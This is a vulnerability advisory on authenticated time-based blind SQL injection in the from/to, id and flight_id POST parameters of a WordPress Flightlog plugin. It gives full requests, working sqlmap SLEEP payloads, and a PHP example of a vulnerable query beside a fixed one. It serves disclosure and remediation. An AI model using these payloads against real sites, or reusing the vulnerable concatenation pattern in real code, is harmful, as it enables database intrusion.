The plugin does not sanitise, validate or escape various POST parameters before using them in a SQL statement, leading to SQL injections exploitable by editor and administrator users.
1. to and from parameters (Editor Level)

Steps:
- Tools -> Flightlog -> add a record

Request:

POST http://172.28.128.50/wp-admin/tools.php?page=flightlog-entries-menu HTTP/1.1
Proxy-Connection: keep-alive
Content-Length: 116
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
Origin: http://172.28.128.50
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-GPC: 1
Referer: http://172.28.128.50/wp-admin/tools.php?page=flightlog-entries-menu
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: [editor+]
Host: 172.28.128.50

section=flight&dt=&from=1&to=1&carrier=1&aircraft=1&ifr_vfr=0&day_night=0&approaches=&landings=&plane_id=&Submit=Add

Sample SQLMap Output:

sqlmap identified the following injection point(s) with a total of 467 HTTP(s) requests:
---
Parameter: to (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: section=flight&dt=&from=1&to=1 AND (SELECT 1824 FROM (SELECT(SLEEP(5)))Eims)&carrier=1&aircraft=1&ifr_vfr=0&day_night=0&approaches=&landings=&plane_id=&Submit=Add

Parameter: from (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: section=flight&dt=&from=1 AND (SELECT 9760 FROM (SELECT(SLEEP(5)))zCHx)&to=1&carrier=1&aircraft=1&ifr_vfr=0&day_night=0&approaches=&landings=&plane_id=&Submit=Add
---

2. id parameter vulnerable (Admin Level)

Steps:
- Settings -> Flightlog
- add an airport
- update the airport

Sample Request:

POST http://172.28.128.50/wp-admin/options-general.php?page=flightlog-settings-menu HTTP/1.1
Proxy-Connection: keep-alive
Content-Length: 84
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
Origin: http://172.28.128.50
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-GPC: 1
Referer: http://172.28.128.50/wp-admin/options-general.php?page=flightlog-settings-menu
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: [admin]
Host: 172.28.128.50

section=airports&id=2&name=a&iata=BHO&lat=0.0000000&lng=0.0000000&Submit=Update

SQLMap Output:

Parameter: id (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: section=airports&id=2 AND (SELECT 1421 FROM (SELECT(SLEEP(5)))GfMZ)&name=bhopal&iata=BHO&lat=0.0000000&lng=0.0000000&Submit=Update

3. flight_id parameter vulnerable (Editor Level)

Steps:
- Login as editor
- Tools -> FlightLog
- Edit a flight log entry and add a remark

Vulnerable Request:

POST http://172.28.128.50/wp-admin/tools.php?page=flightlog-entries-menu HTTP/1.1
Proxy-Connection: keep-alive
Content-Length: 52
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
Origin: http://172.28.128.50
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-GPC: 1
Referer: http://172.28.128.50/wp-admin/tools.php?page=flightlog-entries-menu
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: [editor+]
Host: 172.28.128.50

flight_id=3045&section=rem&remark=Test&Submit=Update

SQLMap Sample Output:

Parameter: flight_id (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: flight_id=3045 AND (SELECT 1932 FROM (SELECT(SLEEP(5)))XEdw)&section=rem&remark=Test&Submit=Update
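The advisory names the root cause (POST values used in SQL without sanitisation, validation or escaping) but does not show the plugin code. As an added example, not the Flightlog plugin's own code, the following shows the vulnerable concatenation pattern beside a hardened WordPress handler that coerces the from/to and flight_id values to integers and binds every value through $wpdb->prepare() and $wpdb->update(); the table name flightlog_flights, the nonce actions and the capability used are assumptions chosen for the illustration.

```php
<?php
// BEFORE (the vulnerable pattern the advisory describes): POST values are
// concatenated straight into the SQL text, so from/to reach MySQL unchanged.
function flightlog_add_flight_vulnerable() {
    global $wpdb;
    $table = $wpdb->prefix . 'flightlog_flights'; // assumed table name
    $sql   = "INSERT INTO {$table} (dt, `from`, `to`, carrier, aircraft) VALUES ('"
           . $_POST['dt'] . "', " . $_POST['from'] . ", " . $_POST['to'] . ", "
           . $_POST['carrier'] . ", " . $_POST['aircraft'] . ")";
    return $wpdb->query( $sql );
}

// AFTER: authorise the request, coerce numeric ids to integers, and let
// $wpdb->prepare() bind every value so user input is never part of the SQL text.
function flightlog_add_flight_fixed() {
    global $wpdb;
    if ( ! current_user_can( 'edit_others_posts' ) ) {   // editor-or-higher; assumed capability
        wp_die( 'Insufficient privileges' );
    }
    check_admin_referer( 'flightlog_add_flight' );        // assumed nonce action
    $table    = $wpdb->prefix . 'flightlog_flights';      // assumed table name
    $dt       = sanitize_text_field( wp_unslash( $_POST['dt'] ?? '' ) );
    $from     = absint( $_POST['from'] ?? 0 );            // airport ids: digits only
    $to       = absint( $_POST['to'] ?? 0 );
    $carrier  = absint( $_POST['carrier'] ?? 0 );
    $aircraft = absint( $_POST['aircraft'] ?? 0 );
    $wpdb->query( $wpdb->prepare(
        "INSERT INTO {$table} (dt, `from`, `to`, carrier, aircraft) VALUES (%s, %d, %d, %d, %d)",
        $dt, $from, $to, $carrier, $aircraft
    ) );
    return $wpdb->insert_id;
}

// The remark update (flight_id) and the airport update (id) get the same treatment;
// $wpdb->update() with explicit format strings is an equivalent way to bind values.
function flightlog_update_remark_fixed() {
    global $wpdb;
    if ( ! current_user_can( 'edit_others_posts' ) ) { wp_die( 'Insufficient privileges' ); }
    check_admin_referer( 'flightlog_update_remark' );     // assumed nonce action
    $flight_id = absint( $_POST['flight_id'] ?? 0 );      // non-numeric input becomes 0
    $remark    = sanitize_textarea_field( wp_unslash( $_POST['remark'] ?? '' ) );
    return $wpdb->update(
        $wpdb->prefix . 'flightlog_flights',              // assumed table name
        array( 'remark' => $remark ), array( 'id' => $flight_id ),
        array( '%s' ),                array( '%d' )
    );
}
```

With the ids forced through absint(), a value such as `3045 AND (SELECT ...)` collapses to the integer 3045 before the query is built, and the time-based probes sqlmap reported above no longer reach MySQL.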
Shreya Pohekar of Codevigilant Project
Yes
2021-05-19
2021-05-19
2021-05-20